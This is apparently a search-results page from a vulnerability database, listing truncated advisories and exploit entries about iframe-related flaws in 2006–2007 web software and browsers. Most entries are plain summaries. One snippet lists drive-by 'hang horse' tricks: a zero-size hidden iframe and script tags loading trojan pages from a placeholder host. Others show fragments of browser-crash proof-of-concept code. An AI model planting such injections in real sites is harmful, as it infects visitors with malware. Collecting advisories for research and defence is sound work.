
5113 matches found

NVD
added 2007/02/15 2:28 a.m. | 8 views

CVE-2006-7022

The Tools module in fx-APP 0.0.8.1 allows remote attackers to misrepresent the contents of a web page via an arbitrary URL in the url parameter to a showhtml action for index.php, which causes the URL to be displayed within an iframe...

10 CVSS | 6.7 AI score | 0.02169 EPSS
Exploits: 0 | References: 4

Cvelist
added 2007/02/15 2:0 a.m. | 15 views

CVE-2006-7022

The Tools module in fx-APP 0.0.8.1 allows remote attackers to misrepresent the contents of a web page via an arbitrary URL in the url parameter to a showhtml action for index.php, which causes the URL to be displayed within an iframe...

6.7 AI score | 0.02169 EPSS
Exploits: 0 | References: 4

CVE
added 2007/02/15 2:0 a.m. | 43 views

CVE-2006-7022

The CVE-2006-7022 entry concerns fx-APP 0.0.8.1, where the Tools module allows remote attackers to misrepresent a web page’s contents by supplying an arbitrary URL in the url parameter to the showhtml action of index.php, causing that URL to render inside an iframe. The available description expl...

10 CVSS | 6.8 AI score | 0.02169 EPSS
Exploits: 0 | References: 4 | Affected Software: 1

Prion
added 2007/02/01 10:28 p.m. | 17 views

Cross site scripting

Cross-site scripting (XSS) vulnerability in the IFrame module before 03.02.01 for DotNetNuke (DNN) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "Pass through values."...

6.8 CVSS | 6.1 AI score | 0.01182 EPSS
Exploits: 0 | References: 5 | Affected Software: 1

NVD
added 2007/02/01 10:28 p.m. | 21 views

CVE-2007-0660

Cross-site scripting (XSS) vulnerability in the IFrame module before 03.02.01 for DotNetNuke (DNN) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "Pass through values."...

6.8 CVSS | 5.6 AI score | 0.01182 EPSS
Exploits: 0 | References: 5

CVE
added 2007/02/01 10:0 p.m. | 51 views

CVE-2007-0660

The CVE-2007-0660 issue affects the DotNetNuke (DNN) IFrame module prior to version 03.02.01. The vulnerability stems from improper validation of user-supplied input in the pass-through values, leaving them unfiltered and susceptible to XSS. A remote attacker can exploit this by using crafted URL...

6.8 CVSS | 5.7 AI score | 0.01182 EPSS
Exploits: 0 | References: 5 | Affected Software: 1

NVD
added 2007/01/12 5:4 a.m. | 15 views

CVE-2007-0192

Cross-site request forgery (CSRF) vulnerability in the savemain operation in the adperms section in admin.php in MKPortal allows remote attackers to modify privilege settings, as demonstrated using a getURL of admin.php within a .swf file contained in an IFRAME element, aka the "All Guests are Admi...

7.5 CVSS | 6.9 AI score | 0.01353 EPSS
Exploits: 0 | References: 3

CVE
added 2007/01/11 2:0 a.m. | 46 views

CVE-2007-0192

The CVE-2007-0192 CSRF vulnerability affects MKPortal’s admin.php in the save_main operation (ad_perms) where an attacker can induce privilege changes. The issue is exposed via a crafted getURL in a .swf loaded in an IFRAME, enabling remote modification of privilege settings (All Guests are Admin...

7.5 CVSS | 6.9 AI score | 0.01353 EPSS
Exploits: 0 | References: 3 | Affected Software: 1

exploitpack
added 2007/01/11 12:0 a.m. | 10 views

phpBB 2.0.21 - privmsg.php HTML Injection

phpBB 2.0.21 - privmsg.php HTML Injection source: https://www.securityfocus.com/bid/22001/info phpBB is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and scri...

7.6 AI score
Exploits: 0

securityvulns
added 2007/01/11 12:0 a.m. | 61 views

phpBB (privmsg.php) XSS Exploit

phpBB privmsg.php XSS Exploit By: Demential Web: http://headburn.altervista.org E-mail: [email protected] PhpBB website: http://phpbb.com Exploit tested on phpBB 2.0.21 Secunia.com said: Input passed to the form field "Message body" in privmsg.php is not properly sanitised before it is returned to...

Exploits: 0

NVD
added 2007/01/08 8:28 p.m. | 21 views

CVE-2007-0099

Race condition in the msxml3 module in Microsoft XML Core Services 3.0, as used in Internet Explorer 6 and other applications, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via many nested tags in an XML document in an IFRAME, when synchronous...

9.3 CVSS | 7.6 AI score | 0.24888 EPSS
Exploits: 1 | References: 15

CVE
added 2007/01/08 8:0 p.m. | 90 views

CVE-2007-0099

CVE-2007-0099 describes a race-condition in Microsoft XML Core Services 3.0 (MSXML3) used by Internet Explorer 6 and other apps. The flaw can be triggered by many nested XML tags in an IFRAME when synchronous rendering is disrupted by asynchronous events (e.g., JavaScript timers), leading to NULL...

9.3 CVSS | 7.4 AI score | 0.24888 EPSS
Exploits: 1 | References: 15 | Affected Software: 2

Packet Storm
added 2006/10/20 12:0 a.m. | 25 views

ffoxdie.txt

= 9 setTimeout'foo',3000; else if counter = 6 setTimeout'foo',200; else setTimeout'foo',1000; counter++; else document.getElementById'foo'.src = "http://lcamtuf.coredump.cx/ffoxdieok.html"; // -- Tyger, Tyger. burning bright In the forests of the night, What immortal hand or eye Could frame thy...

7.4 AI score
Exploits: 0

myhack58
added 2006/07/31 12:0 a.m. | 12 views

Beware of being black with caution eWebEditor online editor-vulnerability warning-the black bar safety net

Network popular the website is news, forums, e-Mall as well as the blog. These systems will be required to have set the text size, color and insert images and other functions, so on the network there is a corresponding third-party functional components to complete the corresponding function, such...

6.9 AI score
Exploits: 0

RedHat Linux
added 2006/07/29 12:16 a.m. | 4 views

security flaw

Mozilla Firefox and Thunderbird before 1.5.0.4 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via (1) nested tags in a select tag, (2) a DOMNodeRemoved mutation event, (3) "Content-implemented tree views," (4) BoxObjects, (5) the XBL implementation, (6) an ifram...

9.3 CVSS | 7.7 AI score | 0.06832 EPSS
Exploits: 0 | References: 4

RedHat Linux
added 2006/07/20 1:41 p.m. | 0 views

security flaw

Mozilla Firefox and Thunderbird before 1.5.0.4 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via (1) nested tags in a select tag, (2) a DOMNodeRemoved mutation event, (3) "Content-implemented tree views," (4) BoxObjects, (5) the XBL implementation, (6) an ifram...

9.3 CVSS | 6.2 AI score | 0.06832 EPSS
Exploits: 0 | References: 4

myhack58
added 2006/07/19 12:0 a.m. | 14 views

Hung it to 4 effective method(summary)-vulnerability warning-the black bar safety net

One, the most simple are also the most effective | iframe src=http://www.xxx.com/muma.html width=0 height=0/iframe --- Second, js hang horse script src=http://www. xxx. com/muma. js/script --- Third, the js modification encryption SCRIPT language="JScript. Encode" src=http://www. xxx. com/muma...

7.2 AI score
Exploits: 0

NVD
added 2006/07/06 1:5 a.m. | 14 views

CVE-2006-3353

Opera 9 allows remote attackers to cause a denial of service (crash) via a crafted web page that triggers an out-of-bounds memory access, related to an iframe and JavaScript that accesses certain style sheets properties...

5 CVSS | 6.6 AI score | 0.08209 EPSS
Exploits: 1 | References: 7

CVE
added 2006/07/06 1:0 a.m. | 51 views

CVE-2006-3353

Opera 9 is affected by CVE-2006-3353. A crafted web page can cause a denial of service (crash) through an out-of-bounds memory access, triggered by an iframe and JavaScript accessing certain styleSheets properties. The description consistently attributes this to Opera 9 and cites a DoS impact; no...

5 CVSS | 6.9 AI score | 0.08209 EPSS
Exploits: 1 | References: 7 | Affected Software: 1

Exploit DB
added 2006/07/01 12:0 a.m. | 29 views

Opera Web Browser 9.00 - 'iframe' Remote Denial of Service

function mystyle if fake.document.styleSheets.length == 1 f = document.forms"basicstyle".elements; for j = 0; j milw0rm.com 2006-07-01...

7 AI score
Exploits: 0